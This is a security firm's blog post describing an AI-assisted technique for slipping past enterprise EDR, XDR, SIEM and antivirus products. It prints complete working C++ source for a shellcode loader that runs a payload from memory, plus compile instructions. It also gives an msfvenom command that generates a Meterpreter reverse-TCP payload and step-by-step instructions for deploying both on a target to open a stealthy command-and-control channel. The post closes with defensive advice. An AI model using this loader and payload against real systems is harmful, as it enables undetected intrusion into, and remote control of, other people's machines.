Multiple “Impenetrable” Security Platforms, One “Cyborg” Bypass

Multiple “Impenetrable” Security Platforms, One “Cyborg” Bypass by Kyle Malicoate

by | Jul 18, 2025 | Education, Research

Background

Recently, the Stern Security penetration testing team faced a challenge: bypassing some of the toughest enterprise security defenses available today. Among them was a product that claims 100% MITRE ATT&CK detection, protection, and prevention. Another claimed its multi-layered defensive strategy of pattern matching, behavior monitoring, networking access control lists and sandboxing could detect and prevent malware,  Finally an EDR solution paired with “Next-Gen” Antivirus (NGAV).

Dubbing the attack “The Cyborg Bypass,” the Stern Security team used artificial intelligence (AI) to help create a custom loader executable. Combined with a default shellcode payload, this allowed us to successfully evade multiple layers of security—including SIEM, XDR, EDR, and AV solutions from major vendors.

The Security Landscape

Modern enterprises utilize layered security defenses. SIEM platforms collect, analyze and correlate logs to spot threats, trigger alerts and kickoff automation.  XDR solutions provide comprehensive monitoring across devices and networks, and antivirus/EDR tools scan for known malware and suspicious behaviors and respond.

Common penetration testing payloads from tools like Metasploit and Cobalt Strike usually don’t stand a chance. Defenders have seen them a thousand times, and things like static signatures, behavior-based rules, or sandboxing catch them fast. This makes evasion a real challenge, even if you’re doing everything right.

Leveraging AI to Build a Custom Loader

To get around these defenses, the Stern Security penetration testing team used AI to help build a lightweight custom loader—we’ll call it loader.exe. This loader takes a raw, default shellcode payload (shellcode.bin) straight from disk—no obfuscation, no encryption—and executes it directly in memory. Instead of launching a typical executable payload, it keeps things simple and stealthy, avoiding many of the patterns that security tools are trained to detect.

Proof of Concept (POC)

The loader’s core function is to read the shellcode file into memory and execute it using Windows API calls – loader.cpp:

#include <windows.h>
#include <iostream>
#include <fstream>

void ExecuteShellcode(unsigned char* shellcode, SIZE_T size) {
    void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, size);
    ((void(*)())exec)();
}

int main() {
    std::ifstream file("shellcode.bin", std::ios::binary | std::ios::ate);
    SIZE_T size = file.tellg();
    file.seekg(0, std::ios::beg);
    unsigned char* buffer = new unsigned char[size];
    file.read((char*)buffer, size);
    file.close();

    ExecuteShellcode(buffer, size);
    delete[] buffer;
    return 0;
}

Compile the loader using:

x86_64-w64-mingw32-g++ loader.cpp -o loader.exe -static

Create a basic MSF Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=8080 --platform windows -a x64 -f raw -o shellcode.bin

Deployment Process

  1. Generate raw shellcode payload, we’ve tested both default MSF Venom and Cobalt Strike payloads – saved as shellcode.bin.
  2. Compile the loader executable as above.
  3. Transfer both loader.exe and shellcode.bin to the target machine.
  4. Start the C2 listener.
  5. Execute loader.exe on the target – This will load and run the shellcode in memory.
  6. Establish a stealthy command and control (C2) connection, bypassing SIEM, XDR, and AV.

Understanding Execution and Disk Presence

During this process both the loader (loader.exe) and shellcode (shellcode.bin) are present on the target’s disk during runtime. While the shellcode exists as a file, it’s never executed directly. Instead, the loader reads contents of the shellcode file into memory and executes it from there.  This method completely bypasses monitoring of traditional executable file formats.

This approach lowers the chance of detection, since many security tools prioritize monitoring for suspicious executables and process behavior—not just the presence of a file on disk. Surprisingly, even this simple technique was enough to slip past advanced defenses.

Key Takeaways

AI is quickly becoming a powerful asset in offensive security—not just for crafting exploits, but for evading detection altogether. To keep up, defenders should:

  • Don’t rely solely on signature-based detection: Traditional AV and even many “Next-Gen” tools often miss custom loaders and raw shellcode that don’t match known patterns.
  • Strengthen endpoint visibility: Ensure EDR/XDR solutions are configured to log and alert on suspicious in-memory execution—even when no binary is dropped.
  • Harden systems against loader-style malware: Monitor for uncommon API usage (like VirtualAlloc + execution), and block execution from temporary or user-controlled directories

Conclusion

The blend of AI-assisted tooling and custom payload loaders is raising the stakes for both attackers and defenders. Our ability to bypass enterprise-grade defenses—many of which claim to be impenetrable—highlights just how urgently cybersecurity needs to evolve.

Want to know how your defenses would hold up? Reach out to the Stern Security team to explore your current security posture and learn how real-world testing can help you stay ahead of advanced threats.